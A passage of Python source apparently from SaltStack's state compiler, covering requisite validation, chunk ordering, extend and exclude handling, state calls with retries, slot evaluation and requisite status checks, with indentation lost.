"Invalid requisite type '{}' "
"in state '{}', in SLS "
"'{}'. Requisite types must "
"not contain dots, did you "
"mean '{}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{}", '
"please check your syntax.\n"
).format(req_val)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{}" ID "{}" ID "{}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
"Multiple dictionaries defined in "
"argument of state '{}' in SLS '{}'".format(
name, body["__sls__"]
)
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
"No function declared in state '{}' in SLS '{}'".format(
state, body["__sls__"]
)
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{}' in "
"SLS '{}'".format(state, body["__sls__"])
)
return errors
def verify_chunks(self, chunks):
"""
Verify the chunks in a list of low data structures
"""
err = []
for chunk in chunks:
err.extend(self.verify_data(chunk))
return err
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high, orchestration_jid=None):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in high.items():
if name.startswith("__"):
continue
for state, run in body.items():
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if orchestration_jid is not None:
chunk["__orchestration_jid__"] = orchestration_jid
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, str):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in arg.items():
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
elif key == "state":
# Don't pass down a state override
continue
elif key == "name" and not isinstance(val, str):
# Invalid name, fall back to ID
chunk[key] = name
else:
chunk[key] = val
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(iter(entry.keys()))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order += 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def reconcile_extend(self, high):
"""
Pull the extend data and add it to the respective high data
"""
errors = []
if "__extend__" not in high:
return high, errors
ext = high.pop("__extend__")
for ext_chunk in ext:
for name, body in ext_chunk.items():
if name not in high:
state_type = next(x for x in body if not x.startswith("__"))
# Check for a matching 'name' override in high data
ids = find_name(name, state_type, high)
if len(ids) != 1:
errors.append(
"Cannot extend ID '{0}' in '{1}:{2}'. It is not "
"part of the high state.\n"
"This is likely due to a missing include statement "
"or an incorrectly typed ID.\nEnsure that a "
"state with an ID of '{0}' is available\nin "
"environment '{1}' and to SLS '{2}'".format(
name,
body.get("__env__", "base"),
body.get("__sls__", "base"),
)
)
continue
else:
name = ids[0][0]
for state, run in body.items():
if state.startswith("__"):
continue
if state not in high[name]:
high[name][state] = run
continue
# high[name][state] is extended by run, both are lists
for arg in run:
update = False
for hind in range(len(high[name][state])):
if isinstance(arg, str) and isinstance(
high[name][state][hind], str
):
# replacing the function, replace the index
high[name][state].pop(hind)
high[name][state].insert(hind, arg)
update = True
continue
if isinstance(arg, dict) and isinstance(
high[name][state][hind], dict
):
# It is an option, make sure the options match
argfirst = next(iter(arg))
if argfirst == next(iter(high[name][state][hind])):
# If argfirst is a requisite then we must merge
# our requisite with that of the target state
if argfirst in STATE_REQUISITE_KEYWORDS:
high[name][state][hind][argfirst].extend(
arg[argfirst]
)
# otherwise, its not a requisite and we are just extending (replacing)
else:
high[name][state][hind] = arg
update = True
if (
argfirst == "name"
and next(iter(high[name][state][hind])) == "names"
):
# If names are overwritten by name use the name
high[name][state][hind] = arg
if not update:
high[name][state].append(arg)
return high, errors
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(iter(exc.keys()))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associated ids
for name, body in high.items():
if name.startswith("__"):
continue
sls = body.get("__sls__", "")
if not sls:
continue
for ex_ in ex_sls:
if fnmatch.fnmatch(sls, ex_):
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
def requisite_in(self, high):
"""
Extend the data reference with requisite_in arguments
"""
req_in = {
"require_in",
"watch_in",
"onfail_in",
"onchanges_in",
"use",
"use_in",
"prereq",
"prereq_in",
}
req_in_all = req_in.union(
{"require", "watch", "onfail", "onfail_stop", "onchanges"}
)
extend = {}
errors = []
disabled_reqs = self.opts.get("disabled_requisites", [])
if not isinstance(disabled_reqs, list):
disabled_reqs = [disabled_reqs]
for id_, body in high.items():
if not isinstance(body, dict):
continue
for state, run in body.items():
if state.startswith("__"):
continue
for arg in run:
if isinstance(arg, dict):
# It is not a function, verify that the arg is a
# requisite in statement
if len(arg) < 1:
# Empty arg dict
# How did we get this far?
continue
# Split out the components
key = next(iter(arg))
if key not in req_in:
continue
if key in disabled_reqs:
log.warning(
"The %s requisite has been disabled, Ignoring.", key
)
continue
rkey = key.split("_")[0]
items = arg[key]
if isinstance(items, dict):
# Formatted as a single req_in
for _state, name in items.items():
# Not a use requisite_in
found = False
if name not in extend:
extend[name] = OrderedDict()
if "." in _state:
errors.append(
"Invalid requisite in {}: {} for "
"{}, in SLS '{}'. Requisites must "
"not contain dots, did you mean '{}'?".format(
rkey,
_state,
name,
body["__sls__"],
_state[: _state.find(".")],
)
)
_state = _state.split(".")[0]
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if next(iter(extend[name][_state][ind])) == rkey:
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
if isinstance(items, list):
# Formed as a list of requisite additions
hinges = []
for ind in items:
if not isinstance(ind, dict):
# Malformed req_in
if ind in high:
_ind_high = [
x
for x in high[ind]
if not x.startswith("__")
]
ind = {_ind_high[0]: ind}
else:
found = False
for _id in iter(high):
for state in [
state
for state in iter(high[_id])
if not state.startswith("__")
]:
for j in iter(high[_id][state]):
if (
isinstance(j, dict)
and "name" in j
):
if j["name"] == ind:
ind = {state: _id}
found = True
if not found:
continue
if len(ind) < 1:
continue
pstate = next(iter(ind))
pname = ind[pstate]
if pstate == "sls":
# Expand hinges here
hinges = find_sls_ids(pname, high)
else:
hinges.append((pname, pstate))
if "." in pstate:
errors.append(
"Invalid requisite in {}: {} for "
"{}, in SLS '{}'. Requisites must "
"not contain dots, did you mean '{}'?".format(
rkey,
pstate,
pname,
body["__sls__"],
pstate[: pstate.find(".")],
)
)
pstate = pstate.split(".")[0]
for tup in hinges:
name, _state = tup
if key == "prereq_in":
# Add prerequired to origin
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
extend[id_][state].append(
{"prerequired": [{_state: name}]}
)
if key == "prereq":
# Add prerequired to prereqs
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
extend[ext_id][_req_state].append(
{"prerequired": [{state: id_}]}
)
continue
if key == "use_in":
# Add the running states args to the
# use_in states
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
ext_args = state_args(ext_id, _state, high)
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
ignore_args = req_in_all.union(ext_args)
for arg in high[id_][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(iter(arg.keys())) == "name":
continue
if next(iter(arg.keys())) == "names":
continue
extend[ext_id][_req_state].append(arg)
continue
if key == "use":
# Add the use state's args to the
# running state
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
loc_args = state_args(id_, state, high)
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
ignore_args = req_in_all.union(loc_args)
for arg in high[ext_id][_req_state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(iter(arg.keys())) == "name":
continue
if next(iter(arg.keys())) == "names":
continue
extend[id_][state].append(arg)
continue
found = False
if name not in extend:
extend[name] = OrderedDict()
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if (
next(iter(extend[name][_state][ind]))
== rkey
):
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
high["__extend__"] = []
for key, val in extend.items():
high["__extend__"].append({key: val})
req_in_high, req_in_errors = self.reconcile_extend(high)
errors.extend(req_in_errors)
return req_in_high, errors
def _call_parallel_target(self, name, cdata, low):
"""
The target function to call that will create the parallel thread/process
"""
# we need to re-record start/end duration here because it is impossible to
# correctly calculate further down the chain
utc_start_time = datetime.datetime.utcnow()
self.format_slots(cdata)
tag = _gen_tag(low)
try:
ret = self.states[cdata["full"]](*cdata["args"], **cdata["kwargs"])
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {}".format(trb),
}
utc_finish_time = datetime.datetime.utcnow()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
troot = os.path.join(self.opts["cachedir"], self.jid)
tfile = os.path.join(troot, salt.utils.hashutils.sha1_digest(tag))
if not os.path.isdir(troot):
try:
os.makedirs(troot)
except OSError:
# Looks like the directory was created between the check
# and the attempt, we are safe to pass
pass
with salt.utils.files.fopen(tfile, "wb+") as fp_:
fp_.write(msgpack_serialize(ret))
def call_parallel(self, cdata, low):
"""
Call the state defined in the given cdata in parallel
"""
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
# guessable and fallback in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
proc = salt.utils.process.Process(
target=self._call_parallel_target, args=(name, cdata, low)
)
proc.start()
ret = {
"name": name,
"result": None,
"changes": {},
"comment": "Started in a separate process",
"proc": proc,
}
return ret
@salt.utils.decorators.state.OutputUnifier("content_check", "unify")
def call(self, low, chunks=None, running=None, retries=1):
"""
Call a state directly with the low data structure, verify data
before processing.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
log.info(
"Running state [%s] at time %s",
low["name"].strip() if isinstance(low["name"], str) else low["name"],
local_start_time.time().isoformat(),
)
errors = self.verify_data(low)
if errors:
ret = {
"result": False,
"name": low["name"],
"changes": {},
"comment": "",
}
for err in errors:
ret["comment"] += "{}\n".format(err)
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
return ret
else:
ret = {"result": False, "name": low["name"], "changes": {}}
self.state_con["runas"] = low.get("runas", None)
if low["state"] == "cmd" and "password" in low:
self.state_con["runas_password"] = low["password"]
else:
self.state_con["runas_password"] = low.get("runas_password", None)
if not low.get("__prereq__"):
log.info(
"Executing state %s.%s for [%s]",
low["state"],
low["fun"],
low["name"].strip() if isinstance(low["name"], str) else low["name"],
)
if "provider" in low:
self.load_modules(low)
state_func_name = "{0[state]}.{0[fun]}".format(low)
cdata = salt.utils.args.format_call(
self.states[state_func_name],
low,
initial_ret={"full": state_func_name},
expected_extra_kws=STATE_INTERNAL_KEYWORDS,
)
inject_globals = {
# Pass a copy of the running dictionary, the low state chunks and
# the current state dictionaries.
# We pass deep copies here because we don't want any misbehaving
# state module to change these at runtime.
"__low__": immutabletypes.freeze(low),
"__running__": immutabletypes.freeze(running) if running else {},
"__instance_id__": self.instance_id,
"__lowstate__": immutabletypes.freeze(chunks) if chunks else {},
}
if "__env__" in low:
inject_globals["__env__"] = str(low["__env__"])
if self.inject_globals:
inject_globals.update(self.inject_globals)
if low.get("__prereq__"):
test = sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]
sys.modules[self.states[cdata["full"]].__module__].__opts__["test"] = True
try:
# Let's get a reference to the salt environment to use within this
# state call.
#
# If the state function accepts an 'env' keyword argument, it
# allows the state to be overridden(we look for that in cdata). If
# that's not found in cdata, we look for what we're being passed in
# the original data, namely, the special dunder __env__. If that's
# not found we default to 'base'
req_list = ("unless", "onlyif", "creates")
if (
any(req in low for req in req_list)
and "{0[state]}.mod_run_check".format(low) not in self.states
):
ret.update(self._run_check(low))
if not self.opts.get("lock_saltenv", False):
# NOTE: Overriding the saltenv when lock_saltenv is blocked in
# salt/modules/state.py, before we ever get here, but this
# additional check keeps use of the State class outside of the
# salt/modules/state.py from getting around this setting.
if "saltenv" in low:
inject_globals["__env__"] = str(low["saltenv"])
elif isinstance(cdata["kwargs"].get("env", None), str):
# User is using a deprecated env setting which was parsed by
# format_call.
# We check for a string type since module functions which
# allow setting the OS environ also make use of the "env"
# keyword argument, which is not a string
inject_globals["__env__"] = str(cdata["kwargs"]["env"])
if "__env__" not in inject_globals:
# Let's use the default environment
inject_globals["__env__"] = "base"
if "__orchestration_jid__" in low:
inject_globals["__orchestration_jid__"] = low["__orchestration_jid__"]
if "result" not in ret or ret["result"] is False:
self.states.inject_globals = inject_globals
if self.mocked:
ret = mock_ret(cdata)
else:
# Execute the state function
if not low.get("__prereq__") and low.get("parallel"):
# run the state call in parallel, but only if not in a prereq
ret = self.call_parallel(cdata, low)
else:
self.format_slots(cdata)
ret = self.states[cdata["full"]](
*cdata["args"], **cdata["kwargs"]
)
self.states.inject_globals = {}
if (
"check_cmd" in low
and "{0[state]}.mod_run_check_cmd".format(low) not in self.states
):
ret.update(self._run_check_cmd(low))
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
# guessable and fallback in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {}".format(trb),
}
finally:
if low.get("__prereq__"):
sys.modules[self.states[cdata["full"]].__module__].__opts__[
"test"
] = test
self.state_con.pop("runas", None)
self.state_con.pop("runas_password", None)
if not isinstance(ret, dict):
return ret
# If format_call got any warnings, let's show them to the user
if "warnings" in cdata:
ret.setdefault("warnings", []).extend(cdata["warnings"])
if "provider" in low:
self.load_modules()
if low.get("__prereq__"):
low["__prereq__"] = False
return ret
ret["__sls__"] = low.get("__sls__")
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
utc_finish_time = datetime.datetime.utcnow()
timezone_delta = datetime.datetime.utcnow() - datetime.datetime.now()
local_finish_time = utc_finish_time - timezone_delta
local_start_time = utc_start_time - timezone_delta
ret["start_time"] = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
ret["__id__"] = low["__id__"]
log.info(
"Completed state [%s] at time %s (duration_in_ms=%s)",
low["name"].strip() if isinstance(low["name"], str) else low["name"],
local_finish_time.time().isoformat(),
duration,
)
if "retry" in low:
low["retry"] = self.verify_retry_data(low["retry"])
if not sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]:
if low["retry"]["until"] != ret["result"]:
if low["retry"]["attempts"] > retries:
interval = low["retry"]["interval"]
if low["retry"]["splay"] != 0:
interval = interval + random.randint(
0, low["retry"]["splay"]
)
log.info(
"State result does not match retry until value, "
"state will be re-run in %s seconds",
interval,
)
self.functions["test.sleep"](interval)
retry_ret = self.call(low, chunks, running, retries=retries + 1)
orig_ret = ret
ret = retry_ret
ret["comment"] = "\n".join(
[
(
'Attempt {}: Returned a result of "{}", '
'with the following comment: "{}"'.format(
retries, orig_ret["result"], orig_ret["comment"]
)
),
"" if not ret["comment"] else ret["comment"],
]
)
ret["duration"] = (
ret["duration"] + orig_ret["duration"] + (interval * 1000)
)
if retries == 1:
ret["start_time"] = orig_ret["start_time"]
else:
ret["comment"] = " ".join(
[
"" if not ret["comment"] else str(ret["comment"]),
(
"The state would be retried every {1} seconds "
"(with a splay of up to {3} seconds) "
"a maximum of {0} times or until a result of {2} "
"is returned"
).format(
low["retry"]["attempts"],
low["retry"]["interval"],
low["retry"]["until"],
low["retry"]["splay"],
),
]
)
return ret
def __eval_slot(self, slot):
log.debug("Evaluating slot: %s", slot)
fmt = slot.split(":", 2)
if len(fmt) != 3:
log.warning("Malformed slot: %s", slot)
return slot
if fmt[1] != "salt":
log.warning("Malformed slot: %s", slot)
log.warning(
"Only execution modules are currently supported in slots. This means slot "
'should start with "__slot__:salt:"'
)
return slot
fun, args, kwargs = salt.utils.args.parse_function(fmt[2])
if not fun or fun not in self.functions:
log.warning("Malformed slot: %s", slot)
log.warning(
"Execution module should be specified in a function call format: "
"test.arg('arg', kw='kwarg')"
)
return slot
log.debug("Calling slot: %s(%s, %s)", fun, args, kwargs)
slot_return = self.functions[fun](*args, **kwargs)
# Given input __slot__:salt:test.arg(somekey="value").not.exist ~ /appended
# slot_text should be __slot...).not.exist
# append_data should be ~ /appended
slot_text = fmt[2].split("~")[0]
append_data = fmt[2].split("~", 1)[1:]
log.debug("slot_text: %s", slot_text)
log.debug("append_data: %s", append_data)
# Support parsing slot dict response
# return_get should result in a kwargs.nested.dict path by getting
# everything after first closing paren: )
return_get = None
try:
return_get = slot_text[slot_text.rindex(")") + 1 :]
except ValueError:
pass
if return_get:
# remove first period
return_get = return_get.split(".", 1)[1].strip()
log.debug("Searching slot result %s for %s", slot_return, return_get)
slot_return = salt.utils.data.traverse_dict_and_list(
slot_return, return_get, default=None, delimiter="."
)
if append_data:
if isinstance(slot_return, str):
# Append text to slot string result
append_data = " ".join(append_data).strip()
log.debug("appending to slot result: %s", append_data)
slot_return += append_data
else:
log.error("Ignoring slot append, slot result is not a string")
return slot_return
def format_slots(self, cdata):
"""
Read in the arguments from the low level slot syntax to make a last
minute runtime call to gather relevant data for the specific routine
Will parse strings, first level of dictionary values, and strings and
first level dict values inside of lists
"""
# __slot__:salt.cmd.run(foo, bar, baz=qux)
SLOT_TEXT = "__slot__:"
ctx = (("args", enumerate(cdata["args"])), ("kwargs", cdata["kwargs"].items()))
for atype, avalues in ctx:
for ind, arg in avalues:
arg = salt.utils.data.decode(arg, keep=True)
if isinstance(arg, dict):
# Search dictionary values for __slot__:
for key, value in arg.items():
try:
if value.startswith(SLOT_TEXT):
log.trace("Slot processsing dict value %s", value)
cdata[atype][ind][key] = self.__eval_slot(value)
except AttributeError:
# Not a string/slot
continue
elif isinstance(arg, list):
for idx, listvalue in enumerate(arg):
log.trace("Slot processing list value: %s", listvalue)
if isinstance(listvalue, dict):
# Search dict values in list for __slot__:
for key, value in listvalue.items():
try:
if value.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested dict value %s",
value,
)
cdata[atype][ind][idx][key] = self.__eval_slot(
value
)
except AttributeError:
# Not a string/slot
continue
if isinstance(listvalue, str):
# Search strings in a list for __slot__:
if listvalue.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested string %s", listvalue
)
cdata[atype][ind][idx] = self.__eval_slot(listvalue)
elif isinstance(arg, str) and arg.startswith(SLOT_TEXT):
# Search strings for __slot__:
log.trace("Slot processsing %s", arg)
cdata[atype][ind] = self.__eval_slot(arg)
else:
# Not a slot, skip it
continue
def verify_retry_data(self, retry_data):
"""
verifies the specified retry data
"""
retry_defaults = {
"until": True,
"attempts": 2,
"splay": 0,
"interval": 30,
}
expected_data = {
"until": bool,
"attempts": int,
"interval": int,
"splay": int,
}
validated_retry_data = {}
if isinstance(retry_data, dict):
for expected_key, value_type in expected_data.items():
if expected_key in retry_data:
if isinstance(retry_data[expected_key], value_type):
validated_retry_data[expected_key] = retry_data[expected_key]
else:
log.warning(
"An invalid value was passed for the retry %s, "
"using default value '%s'",
expected_key,
retry_defaults[expected_key],
)
validated_retry_data[expected_key] = retry_defaults[
expected_key
]
else:
validated_retry_data[expected_key] = retry_defaults[expected_key]
else:
log.warning(
"State is set to retry, but a valid dict for retry "
"configuration was not found. Using retry defaults"
)
validated_retry_data = retry_defaults
return validated_retry_data
def call_chunks(self, chunks):
"""
Iterate over a list of chunks and call them, checking for requires.
"""
# Check for any disabled states
disabled = {}
if "state_runs_disabled" in self.opts["grains"]:
for low in chunks[:]:
state_ = "{}.{}".format(low["state"], low["fun"])
for pat in self.opts["grains"]["state_runs_disabled"]:
if fnmatch.fnmatch(state_, pat):
comment = (
'The state function "{0}" is currently disabled by "{1}", '
"to re-enable, run state.enable {1}."
).format(state_, pat,)
_tag = _gen_tag(low)
disabled[_tag] = {
"changes": {},
"result": False,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
chunks.remove(low)
break
running = {}
for low in chunks:
if "__FAILHARD__" in running:
running.pop("__FAILHARD__")
return running
tag = _gen_tag(low)
if tag not in running:
# Check if this low chunk is paused
action = self.check_pause(low)
if action == "kill":
break
running = self.call_chunk(low, running, chunks)
if self.check_failhard(low, running):
return running
self.active = set()
while True:
if self.reconcile_procs(running):
break
time.sleep(0.01)
ret = dict(list(disabled.items()) + list(running.items()))
return ret
def check_failhard(self, low, running):
"""
Check if the low data chunk should send a failhard signal
"""
tag = _gen_tag(low)
if self.opts.get("test", False):
return False
if low.get("failhard", self.opts["failhard"]) and tag in running:
if running[tag]["result"] is None:
return False
return not running[tag]["result"]
return False
def check_pause(self, low):
"""
Check to see if this low chunk has been paused
"""
if not self.jid:
# Can't pause on salt-ssh since we can't track continuous state
return
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
start = time.time()
if os.path.isfile(pause_path):
try:
while True:
tries = 0
with salt.utils.files.fopen(pause_path, "rb") as fp_:
try:
pdat = msgpack_deserialize(fp_.read())
except salt.utils.msgpack.exceptions.UnpackValueError:
# Reading race condition
if tries > 10:
# Break out if there are a ton of read errors
return
tries += 1
time.sleep(1)
continue
id_ = low["__id__"]
key = ""
if id_ in pdat:
key = id_
elif "__all__" in pdat:
key = "__all__"
if key:
if "duration" in pdat[key]:
now = time.time()
if now - start > pdat[key]["duration"]:
return "run"
if "kill" in pdat[key]:
return "kill"
else:
return "run"
time.sleep(1)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Failed to read in pause data for file located at: %s", pause_path
)
return "run"
return "run"
def reconcile_procs(self, running):
"""
Check the running dict for processes and resolve them
"""
retset = set()
for tag in running:
proc = running[tag].get("proc")
if proc:
if not proc.is_alive():
ret_cache = os.path.join(
self.opts["cachedir"],
self.jid,
salt.utils.hashutils.sha1_digest(tag),
)
if not os.path.isfile(ret_cache):
ret = {
"result": False,
"comment": "Parallel process failed to return",
"name": running[tag]["name"],
"changes": {},
}
try:
with salt.utils.files.fopen(ret_cache, "rb") as fp_:
ret = msgpack_deserialize(fp_.read())
except OSError:
ret = {
"result": False,
"comment": "Parallel cache failure",
"name": running[tag]["name"],
"changes": {},
}
running[tag].update(ret)
running[tag].pop("proc")
else:
retset.add(False)
return False not in retset
def check_requisite(self, low, running, chunks, pre=False):
"""
Look into the running data to check the status of all requisite
states
"""
disabled_reqs = self.opts.get("disabled_requisites", [])
if not isinstance(disabled_reqs, list):
disabled_reqs = [disabled_reqs]
present = False
# If mod_watch is not available make it a require
if "watch" in low:
if "{}.mod_watch".format(low["state"]) not in self.states:
if "require" in low:
low["require"].extend(low.pop("watch"))
else:
low["require"] = low.pop("watch")
else:
present = True
if "watch_any" in low:
if "{}.mod_watch".format(low["state"]) not in self.states:
if "require_any" in low:
low["require_any"].extend(low.pop("watch_any"))
else:
low["require_any"] = low.pop("watch_any")
else:
present = True
if "require" in low:
present = True
if "require_any" in low:
present = True
if "prerequired" in low:
present = True
if "prereq" in low:
present = True
if "onfail" in low:
present = True
if "onfail_any" in low:
present = True
if "onfail_all" in low:
present = True
if "onchanges" in low:
present = True
if "onchanges_any" in low:
present = True
if not present:
return "met", ()
self.reconcile_procs(running)
reqs = {
"require": [],
"require_any": [],
"watch": [],
"watch_any": [],
"prereq": [],
"onfail": [],
"onfail_any": [],
"onfail_all": [],
"onchanges": [],
"onchanges_any": [],
}
if pre:
reqs["prerequired"] = []
for r_state in reqs:
if r_state in low and low[r_state] is not None:
if r_state in disabled_reqs:
log.warning(
"The %s requisite has been disabled, Ignoring.", r_state
)
continue
for req in low[r_state]:
if isinstance(req, str):
req = {"id": req}
req = trim_req(req)
found = False
for chunk in chunks:
req_key = next(iter(req))
req_val = req[req_key]
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
found = True
reqs[r_state].append(chunk)
continue
try:
if isinstance(req_val, str):
if fnmatch.fnmatch(
chunk["name"], req_val
) or fnmatch.fnmatch(chunk["__id__"], req_val):
if req_key == "id" or chunk["state"] == req_key:
found = True
reqs[r_state].append(chunk)
else:
raise KeyError
except KeyError as exc:
raise SaltRenderError(
"Could not locate requisite of [{}] present in state with name [{}]".format(
req_key, chunk["name"]
)
)
except TypeError:
# On Python 2, the above req_val, being an OrderedDict, will raise a KeyError,
# however on Python 3 it will raise a TypeError
# This was found when running tests.unit.test_state.StateCompilerTestCase.test_render_error_on_invalid_requisite
raise SaltRenderError(
"Could not locate requisite of [{}] present in state with name [{}]".format(
req_key, chunk["name"]
)
)
if not found:
return "unmet", ()
fun_stats = set()
for r_state, chunks in reqs.items():
req_stats = set()
if r_state.startswith("prereq") and not r_state.startswith("prerequired"):
run_dict = self.pre
else:
run_dict = running
while True:
if self.reconcile_procs(run_dict):
break
time.sleep(0.01)
for chunk in chunks:
tag = _gen_tag(chunk)
if tag not in run_dict:
req_stats.add("unmet")
continue
if r_state.startswith("onfail"):
if run_dict[tag]["result"] is True:
req_stats.add("onfail") # At least one state is OK
continue
else:
if run_dict[tag]["result"] is False:
req_stats.add("fail")
continue
if r_state.startswith("onchanges"):
if not run_dict[tag]["changes"]:
req_stats.add("onchanges")
else:
req_stats.add("onchangesmet")
continue
if r_state.startswith("watch") and run_dict[tag]["changes"]:
req_stats.add("change")
continue
if r_state.startswith("prereq") and run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("premet")
if r_state.startswith("prereq") and not run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("pre")
else:
if run_dict[tag].get("__state_ran__", True):
req_stats.add("met")
if r_state.endswith("_any") or r_state == "onfail":
if "met" in req_stats or "change" in req_stats:
if "fail" in req_stats:
req_stats.remove("fail")
if "onchangesmet" in req_stats:
if "onchanges" in req_stats:
req_stats.remove("onchanges")
if "fail" in req_stats:
req_stats.remove("fail")
if "onfail" in req_stats:
# a met requisite in this case implies a success
if "met" in req_stats:
req_stats.remove("onfail")
if r_state.endswith("_all"):
if "onfail" in req_stats:
# a met requisite in this case implies a failure
if "met" in req_stats:
req_stats.remove("met")
fun_stats.update(req_stats)
if "unmet" in fun_stats:
status = "unmet"
elif "fail" in fun_stats:
status = "fail"
elif "pre" in fun_stats:
if "premet" in fun_stats:
status = "met"
else:
status = "pre"
elif "onfail" in fun_stats and "onchangesmet" not in fun_stats:
status = "onfail"
elif "onchanges" in fun_stats and "onchangesmet" not in fun_stats:
status = "onchanges"
elif "change" in fun_stats:
status = "change"
